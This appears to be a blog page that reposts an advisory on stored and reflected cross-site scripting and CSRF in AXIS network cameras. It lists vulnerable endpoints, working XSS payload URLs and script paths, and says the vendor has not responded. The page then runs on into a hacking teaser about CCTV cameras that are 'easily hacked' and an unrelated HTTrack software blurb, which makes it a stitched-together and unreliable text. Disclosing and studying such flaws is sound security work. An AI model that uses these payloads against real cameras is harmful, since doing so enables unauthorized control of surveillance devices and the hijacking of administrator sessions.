Wednesday, May 17, 2017

II. Background
--------------
Axis is the market leader in network video, invented the world’s first
network camera back in 1996 and we’ve been innovators in video surveillance
ever since. Axis network video products are installed in public places and
areas such as retail chains, airports, trains, motorways, universities,
prisons, casinos and banks.
 
III. vulnerability
------------------
AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
scripting vulnerability.
 
IV. technical details
---------------------
These attack vectors allow you to execute an arbitrary javascript code in
the user browser (session) with this steps:
 
# 1 Attacker injects a javascript payload in the vulnerable page:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=
 
This will create a entry in the genneral log file (/var/log/messages) So,
when the user is viewing the log 'system options' -> 'support' -> 'Logs &
Reports':
 
http://{axishost}/axis-cgi/admin/systemlog.cgi?id
will be displayed a prompt for the password of the current user
('AXIS_PASSWORD').
 
However, due to CSRF presented is even possible to perform all actions
already presented: create, edit and remove users and applications, etc. For
example, to delete an application "axis_update" via SXSS:
 
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=
 
* A reflected cross-site scripting affects all models of AXIS devices on
the same parameter:
{axis-cam-model}/view/view.shtml?imagePath=0WLL
<!--
 
# Other Vectors
{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
 
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=
onerror=alert(7) /><!--
{axishost}/admin-bin/editcgi.cgi?file=
 
{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
 
{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis
 
# SCRIPTPATHS:
 
{HTMLROOT}/showReport.shtml
{HTMLROOT}/config.shtml
{HTMLROOT}/incl/top_incl.shtml
{HTMLROOT}/incl/popup_header.shtml
{HTMLROOT}/incl/page_header.shtml
{HTMLROOT}/incl/top_incl_popup.shtml
{HTMLROOT}/viewAreas.shtml
{HTMLROOT}/vmd.shtml
{HTMLROOT}/custom_whiteBalance.shtml
{HTMLROOT}/playWindow.shtml
{HTMLROOT}/incl/ptz_incl.shtml
{HTMLROOT}/view.shtml
{HTMLROOT}/streampreview.shtml
 
And many, many others...
 
V. Impact
---------
allows to run arbitrary code on a victim's browser and computer if combined
with another flaws in the same devices.
 
VI. Affected products
---------------------
Multiple Axis Network products.
 
VII. solution
-------------
It was not provided any solution to the problem.
 
VIII. Credits
-------------
The vulnerability has been discovered by SmithW from OrwellLabs
 
IX. Legal Notices
-----------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
 
X. Vendor solutions and workarounds
-----------------------------------
There was no response from the vendor.
 
 
About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in embedded
device & webapp hacking.

Hack - Terminator: NETWORK CAMERA OR CCTV CAMERA EASILY HACKED

Hack - Terminator: NETWORK CAMERA OR CCTV CAMERA EASILY HACKED:                           THIS IS THE SCREEN SHOT OF US AIRPORT SOUTH RUNWAY This make Thief Easy To enter into the House or Office t...

Tuesday, May 16, 2017

HTTrack Website Copier
Free software offline browser

Version 3.49-1 (04/01/2017)

Engine fixes (keep-alive, redirects, new hashtables, unit tests)
Installing HTTrack: Go to the download section now!
For help and questions: Visit the forumRead the documentationRead the FAQsBrowse the sources

Screenshot of Windows GUI

Welcome

HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility.
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
WinHTTrack is the Windows 2000/XP/Vista/Seven release of HTTrack, and WebHTTrack the Linux/Unix/BSD release. See the download page.